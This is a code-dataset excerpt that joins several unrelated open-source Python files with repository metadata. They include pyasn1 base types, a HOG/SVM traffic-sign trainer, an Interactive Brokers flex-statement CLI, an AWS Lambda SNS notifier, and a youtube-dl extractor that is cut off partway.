def miller_index_from_sites(lattice, coords, coords_are_cartesian=True,
round_dp=4, verbose=True):
"""
Get the Miller index of a plane from a list of site coordinates.
A minimum of 3 sets of coordinates are required. If more than 3 sets of
coordinates are given, the best plane that minimises the distance to all
points will be calculated.
Args:
lattice (list or Lattice): A 3x3 lattice matrix or `Lattice` object (for
example obtained from Structure.lattice).
coords (iterable): A list or numpy array of coordinates. Can be
cartesian or fractional coordinates. If more than three sets of
coordinates are provided, the best plane that minimises the
distance to all sites will be calculated.
coords_are_cartesian (bool, optional): Whether the coordinates are
in cartesian space. If using fractional coordinates set to False.
round_dp (int, optional): The number of decimal places to round the
miller index to.
verbose (bool, optional): Whether to print warnings.
Returns:
(tuple): The Miller index.
"""
if not isinstance(lattice, Lattice):
lattice = Lattice(lattice)
return lattice.get_miller_index_from_coords(
coords, coords_are_cartesian=coords_are_cartesian, round_dp=round_dp,
verbose=verbose)
def center_slab(slab):
"""
The goal here is to ensure the center of the slab region
is centered close to c=0.5. This makes it easier to
find the surface sites and apply operations like doping.
There are three cases where the slab in not centered:
1. The slab region is completely between two vacuums in the
box but not necessarily centered. We simply shift the
slab by the difference in its center of mass and 0.5
along the c direction.
2. The slab completely spills outside the box from the bottom
and into the top. This makes it incredibly difficult to
locate surface sites. We iterate through all sites that
spill over (z>c) and shift all sites such that this specific
site is now on the other side. Repeat for all sites with z>c.
3. This is a simpler case of scenario 2. Either the top or bottom
slab sites are at c=0 or c=1. Treat as scenario 2.
Args:
slab (Slab): Slab structure to center
Returns:
Returns a centered slab structure
"""
# get a reasonable r cutoff to sample neighbors
bdists = sorted([nn[1] for nn in
slab.get_neighbors(slab[0], 10) if nn[1] > 0])
r = bdists[0] * 3
all_indices = [i for i, site in enumerate(slab)]
# check if structure is case 2 or 3, shift all the
# sites up to the other side until it is case 1
for site in slab:
if any([nn[1] > slab.lattice.c for nn
in slab.get_neighbors(site, r)]):
shift = 1 - site.frac_coords[2] + 0.05
slab.translate_sites(all_indices, [0, 0, shift])
# now the slab is case 1, shift the center of mass of the slab to 0.5
weights = [s.species.weight for s in slab]
center_of_mass = np.average(slab.frac_coords,
weights=weights, axis=0)
shift = 0.5 - center_of_mass[2]
slab.translate_sites(all_indices, [0, 0, shift])
return slab
def reduce_vector(vector):
# small function to reduce vectors
d = abs(reduce(gcd, vector))
vector = tuple([int(i / d) for i in vector])
return vector
| 45.093734
| 112
| 0.599313
|
1b54d8d24a9c5c39de4c9cd54795773506b7f991
| 19,368
|
py
|
Python
|
src/pyasn1/type/base.py
|
MarletteFunding/aws-kube-codesuite
|
ab4e5ce45416b83bffb947ab8d234df5437f4fca
|
[
"Apache-2.0"
] | 184
|
2017-12-20T21:50:06.000Z
|
2022-03-19T13:24:58.000Z
|
src/pyasn1/type/base.py
|
MarletteFunding/aws-kube-codesuite
|
ab4e5ce45416b83bffb947ab8d234df5437f4fca
|
[
"Apache-2.0"
] | 15
|
2018-01-17T17:30:51.000Z
|
2021-12-16T14:25:09.000Z
|
src/pyasn1/type/base.py
|
MarletteFunding/aws-kube-codesuite
|
ab4e5ce45416b83bffb947ab8d234df5437f4fca
|
[
"Apache-2.0"
] | 136
|
2018-01-09T22:52:06.000Z
|
2022-02-24T13:26:18.000Z
|
#
# This file is part of pyasn1 software.
#
# Copyright (c) 2005-2017, Ilya Etingof <etingof@gmail.com>
# License: http://pyasn1.sf.net/license.html
#
import sys
from pyasn1.type import constraint, tagmap, tag
from pyasn1.compat import calling
from pyasn1 import error
__all__ = ['Asn1Item', 'Asn1ItemBase', 'AbstractSimpleAsn1Item', 'AbstractConstructedAsn1Item']
class Asn1Item(object):
@classmethod
def getTypeId(cls, increment=1):
try:
Asn1Item._typeCounter += increment
except AttributeError:
Asn1Item._typeCounter = increment
return Asn1Item._typeCounter
class Asn1ItemBase(Asn1Item):
#: Set or return a :py:class:`~pyasn1.type.tag.TagSet` object representing
#: ASN.1 tag(s) associated with |ASN.1| type.
tagSet = tag.TagSet()
#: Default :py:class:`~pyasn1.type.constraint.ConstraintsIntersection`
#: object imposing constraints on initialization values.
subtypeSpec = constraint.ConstraintsIntersection()
# Disambiguation ASN.1 types identification
typeId = None
def __init__(self, **kwargs):
readOnly = {
'tagSet': self.tagSet,
'subtypeSpec': self.subtypeSpec
}
readOnly.update(kwargs)
self.__dict__.update(readOnly)
self._readOnly = readOnly
def __setattr__(self, name, value):
if name[0] != '_' and name in self._readOnly:
raise error.PyAsn1Error('read-only instance attribute "%s"' % name)
self.__dict__[name] = value
@property
def readOnly(self):
return self._readOnly
@property
def effectiveTagSet(self):
"""For |ASN.1| type is equivalent to *tagSet*
"""
return self.tagSet # used by untagged types
@property
def tagMap(self):
"""Return a :class:`~pyasn1.type.tagmap.TagMap` object mapping ASN.1 tags to ASN.1 objects within callee object.
"""
return tagmap.TagMap({self.tagSet: self})
def isSameTypeWith(self, other, matchTags=True, matchConstraints=True):
"""Examine |ASN.1| type for equality with other ASN.1 type.
ASN.1 tags (:py:mod:`~pyasn1.type.tag`) and constraints
(:py:mod:`~pyasn1.type.constraint`) are examined when carrying
out ASN.1 types comparison.
No Python inheritance relationship between PyASN1 objects is considered.
Parameters
----------
other: a pyasn1 type object
Class instance representing ASN.1 type.
Returns
-------
: :class:`bool`
:class:`True` if *other* is |ASN.1| type,
:class:`False` otherwise.
"""
return (self is other or
(not matchTags or self.tagSet == other.tagSet) and
(not matchConstraints or self.subtypeSpec == other.subtypeSpec))
def isSuperTypeOf(self, other, matchTags=True, matchConstraints=True):
"""Examine |ASN.1| type for subtype relationship with other ASN.1 type.
ASN.1 tags (:py:mod:`~pyasn1.type.tag`) and constraints
(:py:mod:`~pyasn1.type.constraint`) are examined when carrying
out ASN.1 types comparison.
No Python inheritance relationship between PyASN1 objects is considered.
Parameters
----------
other: a pyasn1 type object
Class instance representing ASN.1 type.
Returns
-------
: :class:`bool`
:class:`True` if *other* is a subtype of |ASN.1| type,
:class:`False` otherwise.
"""
return (not matchTags or
(self.tagSet.isSuperTagSetOf(other.tagSet)) and
(not matchConstraints or self.subtypeSpec.isSuperTypeOf(other.subtypeSpec)))
@staticmethod
def isNoValue(*values):
for value in values:
if value is not None and value is not noValue:
return False
return True
# backward compatibility
def getTagSet(self):
return self.tagSet
def getEffectiveTagSet(self):
return self.effectiveTagSet
def getTagMap(self):
return self.tagMap
def getSubtypeSpec(self):
return self.subtypeSpec
def hasValue(self):
return self.isValue
class NoValue(object):
"""Create a singleton instance of NoValue class.
NoValue object can be used as an initializer on PyASN1 type class
instantiation to represent ASN.1 type rather than ASN.1 data value.
No operations other than type comparison can be performed on
a PyASN1 type object.
"""
skipMethods = ('__getattribute__', '__getattr__', '__setattr__', '__delattr__',
'__class__', '__init__', '__del__', '__new__', '__repr__',
'__qualname__', '__objclass__', 'im_class', '__sizeof__')
_instance = None
def __new__(cls):
if cls._instance is None:
def getPlug(name):
def plug(self, *args, **kw):
raise error.PyAsn1Error('Uninitialized ASN.1 value ("%s" attribute looked up)' % name)
return plug
op_names = [name
for typ in (str, int, list, dict)
for name in dir(typ)
if (name not in cls.skipMethods and
name.startswith('__') and
name.endswith('__') and
calling.callable(getattr(typ, name)))]
for name in set(op_names):
setattr(cls, name, getPlug(name))
cls._instance = object.__new__(cls)
return cls._instance
def __getattr__(self, attr):
if attr in self.skipMethods:
raise AttributeError('attribute %s not present' % attr)
raise error.PyAsn1Error('No value for "%s"' % attr)
def __repr__(self):
return '%s()' % self.__class__.__name__
noValue = NoValue()
# Base class for "simple" ASN.1 objects. These are immutable.
class AbstractSimpleAsn1Item(Asn1ItemBase):
#: Default payload value
defaultValue = noValue
def __init__(self, value=noValue, **kwargs):
Asn1ItemBase.__init__(self, **kwargs)
if value is noValue or value is None:
value = self.defaultValue
else:
value = self.prettyIn(value)
try:
self.subtypeSpec(value)
except error.PyAsn1Error:
exType, exValue, exTb = sys.exc_info()
raise exType('%s at %s' % (exValue, self.__class__.__name__))
self._value = value
def __repr__(self):
representation = []
if self._value is not self.defaultValue:
representation.append(self.prettyOut(self._value))
if self.tagSet is not self.__class__.tagSet:
representation.append('tagSet=%r' % (self.tagSet,))
if self.subtypeSpec is not self.__class__.subtypeSpec:
representation.append('subtypeSpec=%r' % (self.subtypeSpec,))
return '%s(%s)' % (self.__class__.__name__, ', '.join(representation))
def __str__(self):
return str(self._value)
def __eq__(self, other):
return self is other and True or self._value == other
def __ne__(self, other):
return self._value != other
def __lt__(self, other):
return self._value < other
def __le__(self, other):
return self._value <= other
def __gt__(self, other):
return self._value > other
def __ge__(self, other):
return self._value >= other
if sys.version_info[0] <= 2:
def __nonzero__(self):
return self._value and True or False
else:
def __bool__(self):
return self._value and True or False
def __hash__(self):
return hash(self._value)
@property
def isValue(self):
"""Indicate if |ASN.1| object represents ASN.1 type or ASN.1 value.
In other words, if *isValue* is `True`, then the ASN.1 object is
initialized.
Returns
-------
: :class:`bool`
:class:`True` if object represents ASN.1 value and type,
:class:`False` if object represents just ASN.1 type.
Note
----
There is an important distinction between PyASN1 type and value objects.
The PyASN1 type objects can only participate in ASN.1 type
operations (subtyping, comparison etc) and serve as a
blueprint for serialization codecs to resolve ambiguous types.
The PyASN1 value objects can additionally participate in most
of built-in Python operations.
"""
return self._value is not noValue
def clone(self, value=noValue, **kwargs):
"""Create a copy of a |ASN.1| type or object.
Any parameters to the *clone()* method will replace corresponding
properties of the |ASN.1| object.
Parameters
----------
value: :class:`tuple`, :class:`str` or |ASN.1| object
Initialization value to pass to new ASN.1 object instead of
inheriting one from the caller.
tagSet: :py:class:`~pyasn1.type.tag.TagSet`
Object representing ASN.1 tag(s) to use in new object instead of inheriting from the caller
subtypeSpec: :py:class:`~pyasn1.type.constraint.ConstraintsIntersection`
Object representing ASN.1 subtype constraint(s) to use in new object instead of inheriting from the caller
Returns
-------
:
new instance of |ASN.1| type/value
"""
if value is noValue or value is None:
if not kwargs:
return self
value = self._value
initilaizers = self.readOnly.copy()
initilaizers.update(kwargs)
return self.__class__(value, **initilaizers)
def subtype(self, value=noValue, **kwargs):
"""Create a copy of a |ASN.1| type or object.
Any parameters to the *subtype()* method will be added to the corresponding
properties of the |ASN.1| object.
Parameters
----------
value: :class:`tuple`, :class:`str` or |ASN.1| object
Initialization value to pass to new ASN.1 object instead of
inheriting one from the caller.
implicitTag: :py:class:`~pyasn1.type.tag.Tag`
Implicitly apply given ASN.1 tag object to caller's
:py:class:`~pyasn1.type.tag.TagSet`, then use the result as
new object's ASN.1 tag(s).
explicitTag: :py:class:`~pyasn1.type.tag.Tag`
Explicitly apply given ASN.1 tag object to caller's
:py:class:`~pyasn1.type.tag.TagSet`, then use the result as
new object's ASN.1 tag(s).
subtypeSpec: :py:class:`~pyasn1.type.constraint.ConstraintsIntersection`
Add ASN.1 constraints object to one of the caller, then
use the result as new object's ASN.1 constraints.
Returns
-------
:
new instance of |ASN.1| type/value
"""
if value is noValue or value is None:
if not kwargs:
return self
value = self._value
initializers = self.readOnly.copy()
implicitTag = kwargs.pop('implicitTag', None)
if implicitTag is not None:
initializers['tagSet'] = self.tagSet.tagImplicitly(implicitTag)
explicitTag = kwargs.pop('explicitTag', None)
if explicitTag is not None:
initializers['tagSet'] = self.tagSet.tagExplicitly(explicitTag)
for arg, option in kwargs.items():
initializers[arg] += option
return self.__class__(value, **initializers)
def prettyIn(self, value):
return value
def prettyOut(self, value):
return str(value)
def prettyPrint(self, scope=0):
"""Provide human-friendly printable object representation.
Returns
-------
: :class:`str`
human-friendly type and/or value representation.
"""
if self.isValue:
return self.prettyOut(self._value)
else:
return '<no value>'
# XXX Compatibility stub
def prettyPrinter(self, scope=0):
return self.prettyPrint(scope)
# noinspection PyUnusedLocal
def prettyPrintType(self, scope=0):
return '%s -> %s' % (self.tagSet, self.__class__.__name__)
#
# Constructed types:
# * There are five of them: Sequence, SequenceOf/SetOf, Set and Choice
# * ASN1 types and values are represened by Python class instances
# * Value initialization is made for defaulted components only
# * Primary method of component addressing is by-position. Data model for base
# type is Python sequence. Additional type-specific addressing methods
# may be implemented for particular types.
# * SequenceOf and SetOf types do not implement any additional methods
# * Sequence, Set and Choice types also implement by-identifier addressing
# * Sequence, Set and Choice types also implement by-asn1-type (tag) addressing
# * Sequence and Set types may include optional and defaulted
# components
# * Constructed types hold a reference to component types used for value
# verification and ordering.
# * Component type is a scalar type for SequenceOf/SetOf types and a list
# of types for Sequence/Set/Choice.
#
def setupComponent():
"""Returns a sentinel value.
Indicates to a constructed type to set up its inner component so that it
can be referred to. This is useful in situation when you want to populate
descendants of a constructed type what requires being able to refer to
their parent types along the way.
Example
-------
>>> constructed['record'] = setupComponent()
>>> constructed['record']['scalar'] = 42
"""
return noValue
class AbstractConstructedAsn1Item(Asn1ItemBase):
#: If `True`, requires exact component type matching,
#: otherwise subtype relation is only enforced
strictConstraints = False
componentType = None
sizeSpec = None
def __init__(self, **kwargs):
readOnly = {
'componentType': self.componentType,
'sizeSpec': self.sizeSpec
}
readOnly.update(kwargs)
Asn1ItemBase.__init__(self, **readOnly)
self._componentValues = []
def __repr__(self):
representation = []
if self.componentType is not self.__class__.componentType:
representation.append('componentType=%r' % (self.componentType,))
if self.tagSet is not self.__class__.tagSet:
representation.append('tagSet=%r' % (self.tagSet,))
if self.subtypeSpec is not self.__class__.subtypeSpec:
representation.append('subtypeSpec=%r' % (self.subtypeSpec,))
representation = '%s(%s)' % (self.__class__.__name__, ', '.join(representation))
if self._componentValues:
for idx, component in enumerate(self._componentValues):
if component is None or component is noValue:
continue
representation += '.setComponentByPosition(%d, %s)' % (idx, repr(component))
return representation
def __eq__(self, other):
return self is other and True or self._componentValues == other
def __ne__(self, other):
return self._componentValues != other
def __lt__(self, other):
return self._componentValues < other
def __le__(self, other):
return self._componentValues <= other
def __gt__(self, other):
return self._componentValues > other
def __ge__(self, other):
return self._componentValues >= other
if sys.version_info[0] <= 2:
def __nonzero__(self):
return self._componentValues and True or False
else:
def __bool__(self):
return self._componentValues and True or False
def _cloneComponentValues(self, myClone, cloneValueFlag):
pass
def clone(self, **kwargs):
"""Create a copy of a |ASN.1| type or object.
Any parameters to the *clone()* method will replace corresponding
properties of the |ASN.1| object.
Parameters
----------
tagSet: :py:class:`~pyasn1.type.tag.TagSet`
Object representing non-default ASN.1 tag(s)
subtypeSpec: :py:class:`~pyasn1.type.constraint.ConstraintsIntersection`
Object representing non-default ASN.1 subtype constraint(s)
sizeSpec: :py:class:`~pyasn1.type.constraint.ConstraintsIntersection`
Object representing non-default ASN.1 size constraint(s)
Returns
-------
:
new instance of |ASN.1| type/value
"""
cloneValueFlag = kwargs.pop('cloneValueFlag', False)
initilaizers = self.readOnly.copy()
initilaizers.update(kwargs)
clone = self.__class__(**initilaizers)
if cloneValueFlag:
self._cloneComponentValues(clone, cloneValueFlag)
return clone
def subtype(self, **kwargs):
"""Create a copy of a |ASN.1| type or object.
Any parameters to the *subtype()* method will be added to the corresponding
properties of the |ASN.1| object.
Parameters
----------
tagSet: :py:class:`~pyasn1.type.tag.TagSet`
Object representing non-default ASN.1 tag(s)
subtypeSpec: :py:class:`~pyasn1.type.constraint.ConstraintsIntersection`
Object representing non-default ASN.1 subtype constraint(s)
sizeSpec: :py:class:`~pyasn1.type.constraint.ConstraintsIntersection`
Object representing non-default ASN.1 size constraint(s)
Returns
-------
:
new instance of |ASN.1| type/value
"""
initializers = self.readOnly.copy()
cloneValueFlag = kwargs.pop('cloneValueFlag', False)
implicitTag = kwargs.pop('implicitTag', None)
if implicitTag is not None:
initializers['tagSet'] = self.tagSet.tagImplicitly(implicitTag)
explicitTag = kwargs.pop('explicitTag', None)
if explicitTag is not None:
initializers['tagSet'] = self.tagSet.tagExplicitly(explicitTag)
for arg, option in kwargs.items():
initializers[arg] += option
clone = self.__class__(**initializers)
if cloneValueFlag:
self._cloneComponentValues(clone, cloneValueFlag)
return clone
def verifySizeSpec(self):
self.sizeSpec(self)
def getComponentByPosition(self, idx):
raise error.PyAsn1Error('Method not implemented')
def setComponentByPosition(self, idx, value, verifyConstraints=True):
raise error.PyAsn1Error('Method not implemented')
def setComponents(self, *args, **kwargs):
for idx, value in enumerate(args):
self[idx] = value
for k in kwargs:
self[k] = kwargs[k]
return self
def __len__(self):
return len(self._componentValues)
def clear(self):
self._componentValues = []
# backward compatibility
def setDefaultComponents(self):
pass
def getComponentType(self):
return self.componentType
| 32.172757
| 120
| 0.618494
|
99acdf9d1b7fc59ebee5a0b6486841c29760478d
| 3,733
|
py
|
Python
|
hog-svm-detection/train.py
|
duytq99/trafficsigns-detection-hog-svm
|
fb0f67b78839f166557cc1c2d81aa4d6ef30394b
|
[
"MIT"
] | null | null | null |
hog-svm-detection/train.py
|
duytq99/trafficsigns-detection-hog-svm
|
fb0f67b78839f166557cc1c2d81aa4d6ef30394b
|
[
"MIT"
] | null | null | null |
hog-svm-detection/train.py
|
duytq99/trafficsigns-detection-hog-svm
|
fb0f67b78839f166557cc1c2d81aa4d6ef30394b
|
[
"MIT"
] | null | null | null |
import os, sys, shutil
import numpy as np
import cv2
from skimage.feature import hog
from sklearn import metrics
from sklearn.linear_model import SGDClassifier
from sklearn.calibration import CalibratedClassifierCV
from imutils import paths
import argparse
import time
import pickle
import random
from tqdm import tqdm
def extract_feature(path):
print("[INFO] extracting training features from {}...".format(path))
data = []
labels = []
filenames = []
index = 0
for imagePath in tqdm(paths.list_images(path)):
index +=1
make = imagePath.split("\\")[-2]
# load the image, convert it to grayscale, and detect edges
image = cv2.imread(imagePath)
try:
gray = cv2.resize(image, (96, 96))
gray = cv2.cvtColor(gray, cv2.COLOR_BGR2GRAY)
# extract Histogram of Oriented Gradients from the logo
hogFeature = hog(gray,orientations=9,pixels_per_cell=(8, 8),cells_per_block=(2, 2),transform_sqrt=True,visualize=False,block_norm='L2')
data.append(hogFeature)
labels.append(make)
filenames.append(imagePath)
except:
print(imagePath)
data = np.stack(data, axis=0)
labels = np.stack(labels, axis=0)
print("[INFO] Feature shape: {}".format(data.shape))
return data, labels, filenames
def main(stage=1):
if stage == 1:
trainPath = r'C:\Users\QuangDuy\Desktop\bienbao_data\BTL_AI\stage1_classifier\train'
valPath = r'C:\Users\QuangDuy\Desktop\bienbao_data\BTL_AI\stage1_classifier\valid'
modelPath = 'models/Stage1-SGD-2-class.sav'
else:
trainPath = r'C:\Users\QuangDuy\Desktop\bienbao_data\BTL_AI\stage2_classifier\train'
valPath = r'C:\Users\QuangDuy\Desktop\bienbao_data\BTL_AI\stage2_classifier\valid'
modelPath = 'models/Stage2-SGD-8-class.sav'
# construct the argument parse and parse command line arguments
ap = argparse.ArgumentParser()
ap.add_argument("-t", "--training", required=False, default=trainPath, help="Path to the training dataset")
ap.add_argument("-v", "--validation", required=False, default=valPath, help="Path to the validation dataset")
args = vars(ap.parse_args())
# initialize the data matrix and labels
start = time.time()
data_train, labels_train, _ = extract_feature(path=args["training"])
data_val, labels_val, filenames_val = extract_feature(path = args["validation"])
print("[INFO] Finish extracting HoG features. Total time: {}".format(time.time()-start))
# define classifier
start = time.time()
print("[INFO] Training...")
clf = SGDClassifier(learning_rate='optimal', loss='hinge', penalty='l2', alpha=0.01, max_iter=15000, verbose=False, n_jobs=-1, tol=1e-3, early_stopping=True)
# calibration for probability estimation
clf_with_prob = CalibratedClassifierCV(clf)
clf_with_prob.fit(data_train, labels_train)
print("[RESULT] Training accuracy:", clf_with_prob.score(data_train, labels_train))
print("[INFO] Finish training SVM model. Total time: {}".format(time.time()-start))
# "train" the nearest neighbors classifier
print("[INFO] Saving model...")
pickle.dump(clf_with_prob, open(modelPath, 'wb'))
print('[INFO] Validation accuracy:', clf_with_prob.score(data_val, labels_val))
# print('Test accuracy on Scratch HoG extractor', model2.score(data2, labels))
print("[RESULT] Confusion matrix...")
print(metrics.confusion_matrix(clf_with_prob.predict(data_val), labels_val))
if __name__=='__main__':
main(1)
# probability estimation reference: https://mmuratarat.github.io/2019-10-12/probabilistic-output-of-svm#:~:text=SVMs%20don't%20output%20probabilities,the%20output%20to%20class%20probabilities.&text=One%20standard%20way%20to%20obtain,in%20many%20decent%20SVM%20implementations.
# Best estimator found by grid search:
# SGDClassifier(alpha=0.001, max_iter=15000, n_jobs=8, verbose=False)
| 39.712766
| 277
| 0.750871
|
ccbb070dba6e7b395b818e34afb4450f9e967987
| 571
|
py
|
Python
|
beautifulsoup4_test/jsonpath_lagou.py
|
fuandenghuo/100-days-of-python
|
50f3263b0984bb6690e565d58604c1882aaf465e
|
[
"MIT"
] | null | null | null |
beautifulsoup4_test/jsonpath_lagou.py
|
fuandenghuo/100-days-of-python
|
50f3263b0984bb6690e565d58604c1882aaf465e
|
[
"MIT"
] | null | null | null |
beautifulsoup4_test/jsonpath_lagou.py
|
fuandenghuo/100-days-of-python
|
50f3263b0984bb6690e565d58604c1882aaf465e
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
__author__ = 'abbot'
from urllib import request
import json
import jsonpath
import ssl
url = 'http://www.lagou.com/lbs/getAllCitySearchLabels.json'
context = ssl._create_unverified_context()
req = request.Request(url)
response = request.urlopen(req,context=context)
html = response.read()
print(html)
jsonObj = json.loads(html)
citylist = jsonpath.jsonpath(jsonObj,'$..name')
print(citylist)
print(type(citylist))
fp = open('city.json','w')
content = json.dumps(citylist,ensure_ascii=False)
print(content)
fp.write(content)
fp.close()
| 16.794118
| 60
| 0.739054
|
c57a71d2bcfde5e1b4a48dc239b082ed9c347d24
| 4,756
|
py
|
Python
|
flexfolio/cli.py
|
grananqvist/flexfolio
|
4c69332cc7511a455dbddb006b7c9b9c8bd0a8ff
|
[
"Apache-2.0"
] | 5
|
2019-09-08T19:30:21.000Z
|
2020-05-07T07:27:13.000Z
|
flexfolio/cli.py
|
grananqvist/flexfolio
|
4c69332cc7511a455dbddb006b7c9b9c8bd0a8ff
|
[
"Apache-2.0"
] | 1
|
2021-06-01T23:37:22.000Z
|
2021-06-01T23:37:22.000Z
|
flexfolio/cli.py
|
grananqvist/flexfolio
|
4c69332cc7511a455dbddb006b7c9b9c8bd0a8ff
|
[
"Apache-2.0"
] | 2
|
2020-01-05T17:57:39.000Z
|
2020-05-23T01:28:11.000Z
|
# -*- coding: utf-8 -*-
"""Console script for flexfolio."""
import sys
import logging
import os.path
from typing import Tuple, Optional, cast
from xml.etree import ElementTree
import click
import polling
import requests
from flexfolio.flex_statement import FlexStatement, ALL_MODELS
FLEX_SERVICE_BASE_URL = \
'https://gdcdyn.interactivebrokers.com' \
'/Universal/servlet/FlexStatementService'
FLEX_DL_TIMEOUT = 120
log = logging.getLogger(__name__)
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
@click.group()
def main() -> None:
pass
@main.command()
@click.argument(
'ib-api-token',
nargs=1,
type=click.STRING
)
@click.argument(
'ib-query-id',
nargs=1,
type=click.STRING
)
@click.argument(
'target-file',
nargs=1,
type=click.Path(exists=False, writable=True,
file_okay=True, dir_okay=False)
)
def fetch_statement(ib_api_token: str, ib_query_id: str,
target_file: str) -> None:
# Proxy the call via an interim function so that other
# packages can import this fn and re-use in their cli
return fetch_statement_logic(ib_api_token, ib_query_id, target_file)
def fetch_statement_logic(ib_api_token: str, ib_query_id: str,
target_file: str) -> None:
def _request_statement() -> Tuple[str, str]:
url = "{base}.SendRequest?t={token}&q={query_id}&v=3".format(
base=FLEX_SERVICE_BASE_URL, token=ib_api_token,
query_id=ib_query_id)
response = requests.get(url)
response.raise_for_status()
tree = ElementTree.fromstring(response.content)
status = tree.find('./Status')
if status is None or status.text != 'Success':
log.error("Error requesting flex report: %s", response.content)
raise ValueError("Error requesting flex report")
reference_code = tree.find('./ReferenceCode')
statement_url = tree.find('./Url')
assert reference_code is not None
assert statement_url is not None
return str(reference_code.text), str(statement_url.text)
def _download_statement(reference_code: str, statement_url: str) -> bytes:
url = "{base}?t={token}&q={reference_code}&v=3".format(
base=statement_url, token=ib_api_token,
reference_code=reference_code)
def _download_report() -> Optional[bytes]:
response = requests.get(url)
response.raise_for_status()
tree = ElementTree.fromstring(response.content)
in_progress = tree.find('./Status')
if in_progress is None:
return response.content
return None
content = polling.poll(
_download_report,
timeout=FLEX_DL_TIMEOUT,
step=0.1)
return cast(bytes, content)
log.info("Requesting statement")
reference_code, statement_url = _request_statement()
log.info("Downloading statement")
flex_stmt = _download_statement(reference_code, statement_url)
with open(target_file, 'wb') as f:
f.write(flex_stmt)
@main.command()
@click.argument(
'flex-statement-path',
nargs=1,
type=click.Path(exists=True)
)
@click.argument(
'target-dir',
nargs=1,
type=click.Path(exists=True, writable=True,
file_okay=False, dir_okay=True)
)
@click.option(
'--output-format',
default='json',
type=click.Choice(['json', 'hdf5', 'pickle', 'msgpack'])
)
@click.option(
'--model',
default=ALL_MODELS
)
def statement_to_pyfolio(flex_statement_path: str,
target_dir: str,
output_format: str,
model: str) -> int:
report = FlexStatement(flex_statement_path)
for fn_name in ('returns', 'positions', 'transactions'):
fn = getattr(report, fn_name)
df = fn(model)
file_suffix = \
os.path.basename(flex_statement_path).replace('.xml', '')
target_file = \
'{dir}/{file_base}-{fn}.{format}'.format(
dir=target_dir,
file_base=file_suffix,
fn=fn_name,
format=output_format)
log.info("Storing %s to %s", fn_name, target_file)
if output_format == 'json':
df.to_json(target_file, orient='table')
elif output_format == 'hdf5':
df.to_hdf(target_file, key=fn_name)
elif output_format == 'pickle':
df.to_pickle(target_file)
elif output_format == 'msgpack':
df.to_msgpack(target_file)
return 0
if __name__ == "__main__":
sys.exit(main()) # pragma: no cover
| 28.479042
| 78
| 0.622792
|
16efc76c4197bde7bfdeb31f4500145cd6c0064d
| 136
|
py
|
Python
|
testapp/models.py
|
ppiyakk2/django-markdownx
|
bb2dfe2528fcedca880a8a78c96ec57c10f8290b
|
[
"BSD-2-Clause-FreeBSD"
] | 628
|
2017-04-23T19:09:49.000Z
|
2022-03-30T19:59:44.000Z
|
testapp/models.py
|
ppiyakk2/django-markdownx
|
bb2dfe2528fcedca880a8a78c96ec57c10f8290b
|
[
"BSD-2-Clause-FreeBSD"
] | 142
|
2017-04-23T20:23:08.000Z
|
2022-03-09T15:42:16.000Z
|
testapp/models.py
|
ppiyakk2/django-markdownx
|
bb2dfe2528fcedca880a8a78c96ec57c10f8290b
|
[
"BSD-2-Clause-FreeBSD"
] | 142
|
2017-04-24T13:55:26.000Z
|
2022-03-11T14:45:57.000Z
|
from django.db import models
from markdownx.models import MarkdownxField
class MyModel(models.Model):
myfield = MarkdownxField()
| 17
| 43
| 0.786765
|
87ba318146d8c0099addf7608c68cccccae5ec0d
| 474
|
py
|
Python
|
lambda/notifier/main.py
|
igorgorbenko/aviasales_kinesis
|
46c099e0f8a96e85244954a6dca1aab81405b91f
|
[
"MIT"
] | 1
|
2020-05-12T08:34:57.000Z
|
2020-05-12T08:34:57.000Z
|
lambda/notifier/main.py
|
igorgorbenko/aviasales_kinesis
|
46c099e0f8a96e85244954a6dca1aab81405b91f
|
[
"MIT"
] | null | null | null |
lambda/notifier/main.py
|
igorgorbenko/aviasales_kinesis
|
46c099e0f8a96e85244954a6dca1aab81405b91f
|
[
"MIT"
] | null | null | null |
import boto3
import base64
import os
SNS_CLIENT = boto3.client('sns')
TOPIC_ARN = os.environ['TOPIC_ARN']
def lambda_handler(event, context):
try:
SNS_CLIENT.publish(TopicArn=TOPIC_ARN,
Message='Hi! I have found an interesting stuff!',
Subject='Airline tickets alarm')
print('Alarm message has been successfully delivered')
except Exception as err:
print('Delivery failure', str(err))
| 27.882353
| 76
| 0.637131
|
80bfa6410fc376c9d06370bdef4e1b0da179a305
| 4,015
|
py
|
Python
|
server/external/youtube-dl/youtube_dl/extractor/abcotvs.py
|
yycc179/urlp
|
d272b74c4aed18f03ccada8817ecf5c572a1bf71
|
[
"MIT"
] | null | null | null |
server/external/youtube-dl/youtube_dl/extractor/abcotvs.py
|
yycc179/urlp
|
d272b74c4aed18f03ccada8817ecf5c572a1bf71
|
[
"MIT"
] | null | null | null |
server/external/youtube-dl/youtube_dl/extractor/abcotvs.py
|
yycc179/urlp
|
d272b74c4aed18f03ccada8817ecf5c572a1bf71
|
[
"MIT"
] | null | null | null |
# coding: utf-8
from __future__ import unicode_literals
import re
from .common import InfoExtractor
from ..utils import (
int_or_none,
parse_iso8601,
)
class ABCOTVSIE(InfoExtractor):
IE_NAME = 'abcotvs'
IE_DESC = 'ABC Owned Television Stations'
_VALID_URL = r'https?://(?:abc(?:7(?:news|ny|chicago)?|11|13|30)|6abc)\.com(?:/[^/]+/(?P<display_id>[^/]+))?/(?P<id>\d+)'
_TESTS = [
{
'url': 'http://abc7news.com/entertainment/east-bay-museum-celebrates-vintage-synthesizers/472581/',
'info_dict': {
'id': '472581',
'display_id': 'east-bay-museum-celebrates-vintage-synthesizers',
'ext': 'mp4',
'title': 'East Bay museum celebrates vintage synthesizers',
'description': 'md5:24ed2bd527096ec2a5c67b9d5a9005f3',
'thumbnail': r're:^https?://.*\.jpg$',
'timestamp': 1421123075,
'upload_date': '20150113',
'uploader': 'Jonathan Bloom',
},
'params': {
# m3u8 download
'skip_download': True,
},
},
{
'url': 'http://abc7news.com/472581',
'only_matching': True,
},
]
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
video_id = mobj.group('id')
display_id = mobj.group('display_id') or video_id
webpage = self._download_webpage(url, display_id)
m3u8 = self._html_search_meta(
'contentURL', webpage, 'm3u8 url', fatal=True).split('?')[0]
formats = self._extract_m3u8_formats(m3u8, display_id, 'mp4')
self._sort_formats(formats)
title = self._og_search_title(webpage).strip()
description = self._og_search_description(webpage).strip()
thumbnail = self._og_search_thumbnail(webpage)
timestamp = parse_iso8601(self._search_regex(
